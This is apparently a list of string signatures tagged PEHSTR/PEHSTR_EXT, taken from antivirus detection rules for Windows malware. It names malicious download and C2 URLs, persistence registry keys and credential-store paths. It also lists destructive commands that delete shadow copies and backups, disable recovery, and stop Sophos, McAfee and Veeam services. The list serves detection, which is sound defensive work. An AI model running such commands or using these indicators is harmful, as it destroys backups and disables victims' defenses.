- -dbat" type= own type= interact start= auto DisplayName= (PEHSTR_EXT)
- sc.exe create (PEHSTR_EXT)
- ' target='_blank'>test</a> (PEHSTR_EXT)
- C:\bootfont.biz (PEHSTR_EXT)
- #webpop.xpg.com.br/Configuracoes.ini (PEHSTR)
- netsh.exe (PEHSTR)
- vrsOkInt.php (PEHSTR)
- okinternet.co.kr (PEHSTR)
- HttpOpenRequestA (PEHSTR)
- system32\drivers\pcihdd.sys (PEHSTR)
- System32\Userinit.exe (PEHSTR)
- .mackt (PEHSTR)
- http://www.myfiledistribution.com/mfd.php (PEHSTR_EXT)
- IELite ver:0.0.0 (PEHSTR_EXT)
- st1.serveblog.net (PEHSTR)
- yllapa.no-ip.info (PEHSTR)
- az8.no-ip.info (PEHSTR)
- CONNECT %s:%i HTTP/1.0 (PEHSTR)
- (SOFTWARE\Classes\http\shell\open\command (PEHSTR)
- @SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR)
- 4Software\Microsoft\Active Setup\Installed Components (PEHSTR)
- sc.exe start (PEHSTR_EXT)
- \drivers\ (PEHSTR_EXT)
- .com/kills.txt?t (PEHSTR_EXT)
- 122.224.9.151/kills.txt?t (PEHSTR_EXT)
- live. (PEHSTR_EXT)
- rds.yahoo. (PEHSTR_EXT)
- yahoo. (PEHSTR_EXT)
- google. (PEHSTR_EXT)
- Software\Microsoft\Internet Explorer (PEHSTR_EXT)
- User-Agent: %s (PEHSTR_EXT)
- CLSID\e405.e405mgr (PEHSTR_EXT)
- ASoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones (PEHSTR)
- text/htm (PEHSTR)
- %s\%s (PEHSTR)
- Software\Microsoft\Internet Explorer (PEHSTR)
- Software\Mozilla\Mozilla Firefox (PEHSTR)
- Control Panel\International (PEHSTR)
- Cmd= (PEHSTR_EXT)
- www.yahoo.com/ (PEHSTR_EXT)
- www.google.com/ (PEHSTR_EXT)
- winhlp32.exe (PEHSTR_EXT)
- Settings\User Agent\Post Platform (PEHSTR_EXT)
- Click here to install latest antispyware tool. (PEHSTR_EXT)
- build for Trojan.exe Version (PEHSTR)
- <windir>\avshld.exe (PEHSTR)
- \Software\Internet Explorer\ (PEHSTR)
- <windir>\nvp.exe (PEHSTR)
- <windir>\avupdt.exe (PEHSTR)
- 7\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ (PEHSTR)
- "\shell\open\command\ (PEHSTR)
- " execute (PEHSTR)
- http://vidquick.info/cgi/ (PEHSTR_EXT)
- Error! Can't initialize plug-ins directory. Please try again later. (PEHSTR_EXT)
- \inetc.dll (PEHSTR_EXT)
- \ExecPri.dll (PEHSTR_EXT)
- trojdie.kxp,assistse.exe,rfw.exe,kavpfw.exe,kpfwsvc.exe,kavstart.exe,kwatch.exe,kavplus.exe (PEHSTR)
- mir.exe,mir.dat (PEHSTR)
- Content-Type: application/x-www-form-urlencoded (PEHSTR)
- HTTP/1.0 (PEHSTR)
- 200 %s=%s=%s/%s=%s=%s/%s=%s (PEHSTR)
- wav\Log-in-long2.wav (PEHSTR)
- wvwww.gamenete.com (PEHSTR)
- look/login.asp (PEHSTR)
- /look/pip.asp (PEHSTR)
- 950 1.50 (PEHSTR)
- SOFTWARE\wSkysoft (PEHSTR)
- http:// (PEHSTR)
- C:\Program Files\sys.bat (PEHSTR_EXT)
- 0C:\Documents and Settings\All Users\zhqbdf16.ini (PEHSTR)
- ?Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run (PEHSTR)
- dfzhqb.exe (PEHSTR)
- Fhttp://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d (PEHSTR)
- asdfjkluiop.com (PEHSTR)
- sweepstakess.com (PEHSTR)
- hotxxxtv.com (PEHSTR)
- freeporntoday.net (PEHSTR)
- freepornnow.net (PEHSTR)
- porn1.org (PEHSTR)
- www.c0rrupted.com (PEHSTR_EXT)
- C:\WINDOWS\system32\imglog.exe (PEHSTR_EXT)
- http://bot.cjfeeds.com (PEHSTR_EXT)
- WARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- c:\log.htm (PEHSTR_EXT)
- C:\pstorage.exe (PEHSTR_EXT)
- C:\userquota.exe (PEHSTR_EXT)
- @upload.php (PEHSTR_EXT)
- www.haoads.cn (PEHSTR)
- chuangzaohuihuang.cn (PEHSTR)
- micr0s0fts.cn (PEHSTR)
- http://unstat.baidu.com (PEHSTR)
- http://ccc.avn12.cn/ccc/qqqccc/post.asp?i=77 (PEHSTR_EXT)
- windows\a.txt (PEHSTR_EXT)
- http://update.xiaoshoupeixun.com/tsbho.ini (PEHSTR_EXT)
- update.microsoft.com (PEHSTR_EXT)
- ksinne.com/bs30.php (PEHSTR_EXT)
- "system.exe" (PEHSTR_EXT)
- http://fishhappy888.gicp.net/pe.exe (PEHSTR_EXT)
- http://happytigeryear.3322.org/pe.exe (PEHSTR_EXT)
- shell\explore\Command=system.exe (PEHSTR_EXT)
- \Autorun.inf (PEHSTR_EXT)
- http://stat.wamme.cn/C8C/gl/cnzz60.html (PEHSTR_EXT)
- system32\drivers\etc\service2.ini (PEHSTR_EXT)
- http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp (PEHSTR_EXT)
- kwstray.exe (PEHSTR_EXT)
- http://www.3322.org/dyndns/getip (PEHSTR_EXT)
- http://127.0.0.1/down/list2.txt (PEHSTR_EXT)
- \NSISdl.dll (PEHSTR_EXT)
- http://psvstats.info/hrtbbn/rwvski.exe (PEHSTR_EXT)
- Runtime VB5 OK. (PEHSTR_EXT)
- \Dialer.dll (PEHSTR_EXT)
- .c:\tmpz\boot.cmd (PEHSTR)
- del /Q /F c:\tmpz\boot.cmd (PEHSTR)
- @c:\ps.cmd (PEHSTR)
- del /Q /F %s (PEHSTR)
- del /Q /F c:\ps.cmd (PEHSTR)
- c:\ntldrxds (PEHSTR)
- 127.0.0.1 updates.symantec.com (PEHSTR)
- %s&ip=%s&mode=%s&dll=%d (PEHSTR_EXT)
- csrss%s.dll (PEHSTR_EXT)
- User-Agent: Mozilla Compatible Ppc Linker (PEHSTR_EXT)
- M:\flash\other\C++\LiteLoader 1.1\Release\ftpplug (PEHSTR_EXT)
- ftpplug2.dll (PEHSTR_EXT)
- User-Agent: Opera/ (PEHSTR_EXT)
- resto/ (PEHSTR_EXT)
- Referer: http://vkontakte.ru/login.php? (PEHSTR_EXT)
- setup.exe (PEHSTR)
- QyuleInstall.exe (PEHSTR)
- !http://update.qyule.com/setup.exe (PEHSTR)
- http://218.204.253.145/setup.exe (PEHSTR)
- 200.206.97.42 (PEHSTR)
- ACTIVX.exe (PEHSTR)
- http://upload.exe (PEHSTR)
- \msjava32\%s.key (PEHSTR)
- C:\windows\xxxzzzyyy.exe (PEHSTR)
- \mf*.dlld (PEHSTR)
- \winaccestor.datd (PEHSTR)
- ,CLSID\{A8981DB9-B2B3-47D7-A890-9C9D9F4C5552} (PEHSTR)
- regsvr32 /s (PEHSTR)
- Software\Privacy Project (PEHSTR)
- 192.168.0.102 (PEHSTR)
- 208.66.194.215 (PEHSTR)
- http://%s/Mail/%s (PEHSTR)
- &javascript:onSubmitToolbarItemClicked( (PEHSTR)
- 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb (PEHSTR)
- WScript.Echo(Encrypt( (PEHSTR)
- POST /interface.asp HTTP/1.1 (PEHSTR)
- User-Agent: (CustomSpy) (PEHSTR)
- GET /qvod.txt HTTP/1.1 (PEHSTR)
- %s\baidu (PEHSTR)
- %s\baidu\%s (PEHSTR)
- 0Projects\xNetInstaller\Release\xNetInstaller.pdb (PEHSTR)
- clcount/count.asp?mac= (PEHSTR)
- SkyMon.exe (PEHSTR)
- ALYac.aye (PEHSTR)
- AyAgent.aye (PEHSTR)
- \systemInfo.ini (PEHSTR)
- DLL.dll (PEHSTR)
- COMResModuleInstance (PEHSTR)
- /c ping localhost -n 3 >> NUL && del (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile (PEHSTR_EXT)
- \Internet Explerer.lnk (PEHSTR_EXT)
- Explorer\DontShowMeThisDialogAgain (PEHSTR_EXT)
- \WinRAR\WinRAR.knl" (PEHSTR_EXT)
- iexplore.exe http://www.pp (PEHSTR_EXT)
- .com (PEHSTR_EXT)
- %s/bserv/bserv.php?%s (PEHSTR_EXT)
- c://2.txt (PEHSTR_EXT)
- spoolcv.exe (PEHSTR_EXT)
- www.msnnetwork.net (PEHSTR_EXT)
- now upgrading.....! (PEHSTR_EXT)
- taskmgre.exe (PEHSTR_EXT)
- taskkill /im (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 (PEHSTR_EXT)
- x9c87vcx987v98cx7v.php?ini= (PEHSTR_EXT)
- POST /x9c87vcx (PEHSTR_EXT)
- .bat (PEHSTR_EXT)
- c:\feji.log (PEHSTR_EXT)
- \pipi_dae_ (PEHSTR_EXT)
- \Happy (PEHSTR_EXT)
- 0123456789hyt.exe (PEHSTR_EXT)
- /verysilent (PEHSTR_EXT)
- \pipi_setup%s%s%s%s_clean_ (PEHSTR_EXT)
- \loaddk.inf (PEHSTR_EXT)
- \run32%d.exe (PEHSTR_EXT)
- \note64.exe (PEHSTR_EXT)
- \notepad32.exe (PEHSTR_EXT)
- %s\notepad%d.exe (PEHSTR_EXT)
- d:\360\360Safe.reg (PEHSTR_EXT)
- 68.68.101.226:777/loading/ (PEHSTR_EXT)
- :777/nhbvyeuds.php (PEHSTR_EXT)
- :251/popopo.php?gg= (PEHSTR_EXT)
- :251/bukuaile.php?df= (PEHSTR_EXT)
- :251/rfrfrfrfrf.php?gg= (PEHSTR_EXT)
- :251/demamacao.php.php?df= (PEHSTR_EXT)
- Server_Crack.rar (PEHSTR)
- \WinH%c%c%c32.exe (PEHSTR)
- C:\Program Files\7rar\ (PEHSTR)
- ico.cab (PEHSTR_EXT)
- url.cab (PEHSTR_EXT)
- \zs.bat (PEHSTR_EXT)
- ukad.com (PEHSTR_EXT)
- /kingsoft.cab (PEHSTR_EXT)
- setup.exe (PEHSTR_EXT)
- http://dl.dropbox.com/ (PEHSTR_EXT)
- /z.jpg (PEHSTR_EXT)
- C:\Progt\ (PEHSTR_EXT)
- C:\ProgFUGI\ (PEHSTR_EXT)
- %MYFILES%\Upd (PEHSTR)
- \Program Files\urlcore.exe /h /r /t /b (PEHSTR_EXT)
- \Internet Explorer.lnk (PEHSTR_EXT)
- \HideDesktopIcons\ClassicStartMenu (PEHSTR_EXT)
- \Tasks\conime.exe (PEHSTR_EXT)
- aaaaaaaaaaaaaaaaaaaaaa.limewebs.com/z/gate.php (PEHSTR_EXT)
- %RootSystem%\hook.dll (PEHSTR)
- //xc.115.bz/tools.exe (PEHSTR)
- \userinit.exe (PEHSTR)
- //a.zz7.in/count.asp (PEHSTR_EXT)
- //tx.xx7.in/a7lm.txt (PEHSTR_EXT)
- taskkill /F /IM %s (PEHSTR_EXT)
- smss.exe|csrss.exe|winlogon.exe|services.exe|svchost.exe (PEHSTR_EXT)
- %APPDATA%\Microsoft\Media Player\DRM128 (PEHSTR_EXT)
- /patch/chkupdate.php (PEHSTR_EXT)
- 222.217.240.30/song/gougou.exe (PEHSTR)
- 222.217.240.30/song/vgauga.exe (PEHSTR)
- 222.217.240.30/song/pison.exe (PEHSTR)
- @rd /f/s/q (PEHSTR_EXT)
- @ping 127.0.0.1 -n 2 (PEHSTR_EXT)
- .win0day.com/ (PEHSTR_EXT)
- Files\update.exe (PEHSTR_EXT)
- \win123b.bat (PEHSTR_EXT)
- del /f /q " (PEHSTR)
- bikfir.dll (PEHSTR)
- k.dilmosofroad.com (PEHSTR)
- http://217.8.117 (PEHSTR_EXT)
- mastergamenameper.club (PEHSTR_EXT)
- browser.exe (PEHSTR_EXT)
- v4.0.30319\thedevilcoder.exe (PEHSTR_EXT)
- Dropbox.Api (PEHSTR_EXT)
- #fasdfgsfsd.dll# (PEHSTR_EXT)
- #fljgaf.dll# (PEHSTR_EXT)
- #f.dgddjkdll# (PEHSTR_EXT)
- http://tj.gogo2021.xyz/ (PEHSTR_EXT)
- \WINDOWS\Temp\MpCz01.tmp (PEHSTR_EXT)
- \TEMP\~1z23.tmp (PEHSTR_EXT)
- passThrough.pdb (PEHSTR_EXT)
- https://buysrilankan.lk/pp/ConsoleApp (PEHSTR_EXT)
- AssemblyCompany (PEHSTR_EXT)
- http://pfsbankgroup.com/ (PEHSTR_EXT)
- .boot (PEHSTR_EXT)
- .JJVQJMA (PEHSTR_EXT)
- C:\Program Files\Common Files\ThinkVantage Fingerprint Software\Drivers\smihlp.sys (PEHSTR_EXT)
- /dumpstatus (PEHSTR_EXT)
- \SystemRoot\system32\BOOTVI (PEHSTR_EXT)
- HTTPWebNode.Agent (PEHSTR_EXT)
- Borland SOAP 1.2 (PEHSTR_EXT)
- ShellExecuteExW (PEHSTR_EXT)
- #fasdfgsfffsd.dll# (PEHSTR_EXT)
- .dgddjkdll# (PEHSTR_EXT)
- \andrq.ini (PEHSTR_EXT)
- Software\Far\Plugin (PEHSTR_EXT)
- \FTP\Hosts (PEHSTR_EXT)
- Software\Ghisler\Total Commander (PEHSTR_EXT)
- SOFTWARE\RIT\The Bat! (PEHSTR_EXT)
- SOFTWARE\Mirabilis\ICQ\DefaultPrefs (PEHSTR_EXT)
- nections\pbk\rasphone.pbk (PEHSTR_EXT)
- \GlobalSCAPE\CuteFTP (PEHSTR_EXT)
- Software\Mail.Ru\Agent\mra_logins (PEHSTR_EXT)
- SOFTWARE\FlashFXP\3 (PEHSTR_EXT)
- \ws_ftp.ini (PEHSTR_EXT)
- http://spotauditor.nsauditor.com (PEHSTR_EXT)
- Change Forgotten Password http://www.change-forgotten-password.com (PEHSTR_EXT)
- http://www.top-password.com/password-recovery-bundle.html (PEHSTR_EXT)
- #fkasdfgffgsfffsd.dll# (PEHSTR_EXT)
- vssadmin Delete Shadows /all /quiet (PEHSTR_EXT)
- vssadmin resize shadowstorage /for=c: /on=c: /maxsize= (PEHSTR_EXT)
- net stop "Sophos Message Router" /y (PEHSTR_EXT)
- net stop "Sophos MCS Client" /y (PEHSTR_EXT)
- net stop "Sophos MCS Agent" /y (PEHSTR_EXT)
- net stop "Sophos Device Control Service" /y (PEHSTR_EXT)
- net stop "Sophos Clean Service" /y (PEHSTR_EXT)
- net stop "Sophos Web Control Service" /y (PEHSTR_EXT)
- net stop "Sophos System Protection Service" /y (PEHSTR_EXT)
- net stop "Sophos Agent" /y (PEHSTR_EXT)
- net stop "Sophos AutoUpdate Service" /y (PEHSTR_EXT)
- net stop "Sophos File Scanner Service" /y (PEHSTR_EXT)
- net stop "Sophos Safestore Service" /y (PEHSTR_EXT)
- net stop "Sophos Health Service" /y (PEHSTR_EXT)
- net stop sophossps /y (PEHSTR_EXT)
- net stop McShield /y (PEHSTR_EXT)
- net stop Antivirus /y (PEHSTR_EXT)
- net stop VeeamDeploymentService /y (PEHSTR_EXT)
- net stop VeeamDeploySvc /y (PEHSTR_EXT)
- net stop VeeamCatalogSvc /y (PEHSTR_EXT)
- Antimalware Service Executable (PEHSTR_EXT)
- SecurityHealth.exe (PEHSTR_EXT)
- #fasfsaf.dll# (PEHSTR_EXT)
- #fasgag.dll# (PEHSTR_EXT)
- #gdfsfds.dll# (PEHSTR_EXT)
- #fsdgdsdsdsd.dll# (PEHSTR_EXT)
- #fasfdddddddddssaf.dll# (PEHSTR_EXT)
- #fasfddddddddssaf.dll# (PEHSTR_EXT)
- #fasfdaaaaaaaadsssaf.dll# (PEHSTR_EXT)
- #gdfsfdllllllls.dll# (PEHSTR_EXT)
- #fasfdddddoklpoddddssaf.dll# (PEHSTR_EXT)
- #fasfdkioioaaaaaaaadsssaf.dll# (PEHSTR_EXT)
- Borland_Protector Cracked v1.0 (PEHSTR_EXT)
- WpfPdfUnblocker.My.Resources (PEHSTR_EXT)
- //github.com/ (PEHSTR_EXT)
- Stealer.exe (PEHSTR_EXT)
- HttpOpenRequestW (PEHSTR_EXT)
- C:\Roaming (PEHSTR_EXT)
- PleaseWait.exe (PEHSTR_EXT)
- C:\Users\PC\Desktop\PleaseWait\PleaseWait\obj\Debug\PleaseWait.pdb (PEHSTR_EXT)
- does not work on your computer (PEHSTR_EXT)
- https://cdn.discordapp.com/attachments/ (PEHSTR_EXT)
- `/File.png (PEHSTR_EXT)
- Windows.Update (PEHSTR_EXT)
- r1c3rstrim/war/ten.nibtxet//:sptth (PEHSTR_EXT)
- #fasfdkioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #gsdggdlllllllokosadsadggggg# (PEHSTR_EXT)
- #fasfdkklljidddddddssaf.dll# (PEHSTR_EXT)
- #gdfsfdlll;;;;llllls.dll# (PEHSTR_EXT)
- https://buysrilankan.lk/k/ConsoleApp (PEHSTR_EXT)
- IKJSUHFNIUFHIUFHIUSFHIUFHIUSFIUSFHIUSFH (PEHSTR_EXT)
- #gsdggdllfsflllllokosadsadggggg# (PEHSTR_EXT)
- #fasffasdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #ijfakkk.dll# (PEHSTR_EXT)
- EfsRpcQueryRecoveryAgents (PEHSTR_EXT)
- PetitPotam.exe (PEHSTR_EXT)
- Xdrsbyaopb.dll (PEHSTR_EXT)
- hquknivslqkb.dll (PEHSTR_EXT)
- C:\Users\LP\Desktop\loader\loader\obj\Debug\loader.pdb (PEHSTR_EXT)
- Vagina.Main (PEHSTR_EXT)
- WindowsFormsApp1.Properties.Resources (PEHSTR_EXT)
- #fasfdsfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #gdfsaffdsflfsafgflllls.dll# (PEHSTR_EXT)
- hjkj.exe (PEHSTR_EXT)
- GPT4_V2.Properties.Resources (PEHSTR_EXT)
- ajwfdaidwa.exe (PEHSTR_EXT)
- jsfeifeofewolf.exe (PEHSTR_EXT)
- WindowsFormsApp1.Properties.Resources.resources (PEHSTR_EXT)
- Revolai.exe (PEHSTR_EXT)
- Sworzy Baba Inc. (PEHSTR_EXT)
- #gsdggdllfsfsdffsflllfgfllokosadsadggggg# (PEHSTR_EXT)
- #fsalluiijuidsfsdfffsdfdsfhfasaf.dll# (PEHSTR_EXT)
- #fafdasgsffsdfdkgfioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #gdfsaffdsffsdfdslfsafgflllls.dll# (PEHSTR_EXT)
- exe.ooc/ac.semohnemul//:sptth (PEHSTR_EXT)
- .ungaina (PEHSTR_EXT)
- .refutab (PEHSTR_EXT)
- .implume (PEHSTR_EXT)
- .turbody (PEHSTR_EXT)
- .calvini (PEHSTR_EXT)
- .becircl (PEHSTR_EXT)
- +.+3+8 (PEHSTR_EXT)
- #fsalluiijuidsxfsdfffsdfdsfhfasaf.dll# (PEHSTR_EXT)
- #fasvxfdsfsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #ijfakkgffsfvxdsfsgk.dll# (PEHSTR_EXT)
- WMIC.exe shadowcopy delete /nointeractive (PEHSTR_EXT)
- bcdedit.exe /set {default} recoveryenabled No (PEHSTR_EXT)
- bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures wbadmin DELETE SYSTEMSTATEBACKUP wbadmin DELETE (PEHSTR_EXT)
- net stop BackupExecAgentAccelerator /y (PEHSTR_EXT)
- net stop BackupExecAgentBrowser /y (PEHSTR_EXT)
- net stop McAfeeEngineService /y (PEHSTR_EXT)
- \XFXyfwyzu (PEHSTR_EXT)
- \XFHqjfszu (PEHSTR_EXT)
- \MoriAgent\Client\Common\ (PEHSTR_EXT)
- FML.dll (PEHSTR_EXT)
- Default.g.resources (PEHSTR_EXT)
- isfd0sd.exe (PEHSTR_EXT)
- System.Runtime.InteropServices (PEHSTR_EXT)
- cmdaaaasssssssssssssssssssssssssssssssssssssssssssssssssaaaaa.exe (PEHSTR_EXT)
- http://user:password@www.includehelp.com:8082/Article/CPrograms/ (PEHSTR_EXT)
- .Properties.Resources.resources (PEHSTR_EXT)
- lpCmdLine (PEHSTR_EXT)
- test-connection -comp google.com -count 1 -Quiet (PEHSTR_EXT)
- Users\Eng Moha (PEHSTR_EXT)
- _R/y* (PEHSTR_EXT)
- #falkfskgdfgdfgdfgdfgsfkkksxvcxfgffkkuihiodsdgag.dll# (PEHSTR_EXT)
- #fafdasgsffgdfgdfsdfdkgcfioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #fasffssasfdsfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- #ijfakkgffsfdsfvxdsfsgk.dll# (PEHSTR_EXT)
- System.Windows.Forms.Form (PEHSTR_EXT)
- v4.0.30319 (PEHSTR_EXT)
- http://gffggfffffrograms/ (PEHSTR_EXT)
- https://anarchyrsps.live/ (PEHSTR_EXT)
- LINCA.Properties.Resources (PEHSTR_EXT)
- MG.Office.Diagram (PEHSTR_EXT)
- #fasdasdadvxfafdfdsgdfgdffsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #faadasdsffgssasfdsfddfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- integralbd.com/inquiry-cim.jpg (PEHSTR_EXT)
- ZtmbDowZtmbnlZtmboadDZtmbataZtmb (PEHSTR_EXT)
- MotivateDesktop.aspx.ASPX.resources (PEHSTR_EXT)
- MotivateDesktop.Properties.Resources (PEHSTR_EXT)
- GUI_Class.QQQQQ.resource (PEHSTR_EXT)
- //asbit.cn/zipack/full (PEHSTR_EXT)
- cmd.exe /c rmdir /s /q (PEHSTR_EXT)
- uplooder.net/img/image/ (PEHSTR_EXT)
- p.png (PEHSTR_EXT)
- p.jpg (PEHSTR_EXT)
- HttpClient (PEHSTR_EXT)
- Play splitscreen games over the internet (PEHSTR_EXT)
- SplitPlay.Resources.resources (PEHSTR_EXT)
- SplitPlay.My (PEHSTR_EXT)
- FreshFoodExpress.Resources (PEHSTR_EXT)
- LinkMaker.Properties.Resources.resources (PEHSTR_EXT)
- SharpStructures.Sorting.SortHelper (PEHSTR_EXT)
- MyWebeSocket.Properties.Resources.resources (PEHSTR_EXT)
- #fasvxfafdfdsgdfgdffsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #fafdafssggdsffgdfgdfsdfdkgcfioioaaaaaoaaadsssaf.dll# (PEHSTR_EXT)
- #ijfakkgdfggffsfdsfvxdsfsgk.dll# (PEHSTR_EXT)
- #sfgds.dll# (PEHSTR_EXT)
- #faaxvdaasdsffgssasfdsfddfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- #fasvddddxdasdadvxfafdfdsgdfgdffsdfffafgsdddddokuijouilpoddddssaf.dll# (PEHSTR_EXT)
- #afadxvaddadfssffassdddddfgvxcddfgdffssgsf.dll# (PEHSTR_EXT)
- =/.|i (PEHSTR_EXT)
- s:// (PEHSTR_EXT)
- http (PEHSTR_EXT)
- .com (PEHSTR_EXT)
- #faaxvdasdsffgssasfdsfddfsfgdffkklvcljigfdddddddssaf.dll# (PEHSTR_EXT)
- #afadxvaddadfssffassfgvxcddfgdffssgsf.dll# (PEHSTR_EXT)
- #ijfakdsxaddkgdfggffsfdsfvxdsfsgk.dll# (PEHSTR_EXT)
- System.Resources.Tools.StronglyTypedResourceBuilder (PEHSTR_EXT)
- ).SendMerlinMessage (PEHSTR_EXT)
- net/http.persistConnWriter.Write (PEHSTR_EXT)
- github.com/lucas-clemente (PEHSTR_EXT)
- github.com/marten-seemann (PEHSTR_EXT)
- ).NewSession (PEHSTR_EXT)
- ).RemoteAddr (PEHSTR_EXT)
- ).AddConn (PEHSTR_EXT)
- ).Hostname (PEHSTR_EXT)
- ).Password (PEHSTR_EXT)
- .ClientTaskResponse (PEHSTR_EXT)
- .ServerPostResponse (PEHSTR_EXT)
- .clientSessionState (PEHSTR_EXT)
- ).GetSessionTicket (PEHSTR_EXT)
- AgentInfo) (PEHSTR_EXT)
- .ServerTaskResponse (PEHSTR_EXT)
- ).SessionTicket (PEHSTR_EXT)
- ).SetSessionState (PEHSTR_EXT)
- ).RemoteSock (PEHSTR_EXT)
- Cradiator.Properties.Resources.resources (PEHSTR_EXT)
- Cradiator.Config.ChangeHandlers (PEHSTR_EXT)
- Kora.Visual (PEHSTR_EXT)
- addddddf.exe (PEHSTR_EXT)
- /c ping yahoo.com (PEHSTR_EXT)
- transfer.sh (PEHSTR_EXT)
- Qhpap.Properties.Resources (PEHSTR_EXT)
- 0mc-global.com (PEHSTR_EXT)
- Vwfdxdn.Properties.Resources (PEHSTR_EXT)
- cdn.discordapp.com (PEHSTR_EXT)
- Jjxpa.Properties.Resources (PEHSTR_EXT)
- Qpchk.Properties.Resources (PEHSTR_EXT)
- Bhailh.Properties.Resources (PEHSTR_EXT)
- Fgewph.Properties.Resources (PEHSTR_EXT)
- Delphi-the best. Fuck off all the rest (PEHSTR_EXT)
- RmJ37K7jNgdAds4OhZ.ejfWpD5ZEiPTOpJbRC (PEHSTR_EXT)
- 91.243.44.22 (PEHSTR_EXT)
- ec2-54-163-171-189.compute-1.amazonaws.com/file/Kefpabz.png (PEHSTR_EXT)
- transfer.sh/get/MiToFC/Pbrdehm.log (PEHSTR_EXT)
- cdn.discordapp.com/attachments/943 (PEHSTR_EXT)
- /943 (PEHSTR_EXT)
- #ffgfgfa.dll# (PEHSTR_EXT)
- #gdhfdsgsdg.dll# (PEHSTR_EXT)
- #sadaaaagfdgadaaadvcxvadaadfgds.dll# (PEHSTR_EXT)
- irontwit/tree/master (PEHSTR_EXT)
- rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1 (PEHSTR_EXT)
- Taurus.Properties.Resources.resources (PEHSTR_EXT)
- Sys.Sys (PEHSTR_EXT)
- DProcessorSE.Properties.Resources.resources (PEHSTR_EXT)
- PlaylistPanda.Properties.Resources.resources (PEHSTR_EXT)
- ProgramInstaller.Interface.resources (PEHSTR_EXT)
- Aune.Resources (PEHSTR_EXT)
- Hohcxvpzw.Sofxcaofbpu (PEHSTR_EXT)
- filetransfer.io/data-package/FudX7hsG/download (PEHSTR_EXT)
- Sbixsmxfzjevgvget.Oxhdshwkefstmcy (PEHSTR_EXT)
- D:\Ext.txt (PEHSTR_EXT)
- investigation.g.resources (PEHSTR_EXT)
- CSP_Ticketing.Resources.resources (PEHSTR_EXT)
- CC.Common.Utils (PEHSTR_EXT)
- BoardExample.Form1.resources (PEHSTR_EXT)
- vpx3x.Properties.YtTh1 (PEHSTR_EXT)
- vpx3x;component/mainwindow.xaml (PEHSTR_EXT)
- kotadiainc.com/Jriww.png (PEHSTR_EXT)
- /pages/page_chart.xaml (PEHSTR_EXT)
- 91.243.44.1 (PEHSTR_EXT)
- infinity-cheats.org/ (PEHSTR_EXT)
- Lhwaghsyrcetsylt.Kiwlulcpmmshh (PEHSTR_EXT)
- Suyehdmfjayr.Atcezcoqa (PEHSTR_EXT)
- Sazwlsquuolhwordff.Aehdzuhwyvotk (PEHSTR_EXT)
- Ftqjogdi.Cfqgqof (PEHSTR_EXT)
- Pqfnbdv.Yyfyodoenbg (PEHSTR_EXT)
- BackgroundWindow.xaml (PEHSTR_EXT)
- IRemotingFormatter.ContinuationWrapper (PEHSTR_EXT)
- MotivateDesktop.Properties.Resources.resources (PEHSTR_EXT)
- Pwjhhi.exe (PEHSTR_EXT)
- kotadiainc.com/Vficclsin.jpg (PEHSTR_EXT)
- 185.222.58.56/cousin.png (PEHSTR_EXT)
- Mxlcipiyomkjax.Qzwpzbhka (PEHSTR_EXT)
- ClocktowersCurse.Properties.Resources.resources (PEHSTR_EXT)
- faf.exe (PEHSTR_EXT)
- /sfsf (PEHSTR_EXT)
- #gdsgdhfdggggggdkksg.dll# (PEHSTR_EXT)
- #dfg.dpolpll# (PEHSTR_EXT)
- #gsdfggfgsd.dll# (PEHSTR_EXT)
- #fd.pdll# (PEHSTR_EXT)
- SharpStructures.Main.SortHelper (PEHSTR_EXT)
- Cycle_Jump_Game.Properties.Resources.resource (PEHSTR_EXT)
- Vsrrp.Properties.Resources.resources (PEHSTR_EXT)
- TakeScreenshotToPath (PEHSTR_EXT)
- get_VirtualScreen (PEHSTR_EXT)
- WindowsFormsApp3.Form1.resources (PEHSTR_EXT)
- Alpha.Beta (PEHSTR_EXT)
- cdn.discordapp.com/attachments/94 (PEHSTR_EXT)
- Ewpdebffkmooliledu.Qqiuktavojbspbc (PEHSTR_EXT)
- Ghsouordm.Rxviadqxhuozven (PEHSTR_EXT)
- Owmghuesewtwpnda.Zuuukpxlassklpmk (PEHSTR_EXT)
- coffee_machine_control.Properties.Resources.resources (PEHSTR_EXT)
- Lytro.Windows.Properties.Resources.resources (PEHSTR_EXT)
- MG.Office.Editor.frmMain.resources (PEHSTR_EXT)
- /hs.refsnart//:sptth (PEHSTR_EXT)
- makefil.Frenc (PEHSTR_EXT)
- transfer.sh/get/ (PEHSTR_EXT)
- SmartPotion.Resources.resources (PEHSTR_EXT)
- TagMp3Saito_WindowsFormsApplication.Properties.Resources.resources (PEHSTR_EXT)
- VendingMachineMk2.Properties.Resources.resource (PEHSTR_EXT)
- HCVQuestionnaire.Properties.Resources.resources (PEHSTR_EXT)
- xNYLEq6LoTjDq7Ifk4c.GW5dSw6H5RTJ9qpMFLn (PEHSTR_EXT)
- E8yX0cfAfZcIOBbq20T.fHItoQfoc1xSykgyGOk (PEHSTR_EXT)
- Pyrite.Properties.Resources.resources (PEHSTR_EXT)
- #fsdfl.dll# (PEHSTR_EXT)
- eddff.dll# (PEHSTR_EXT)
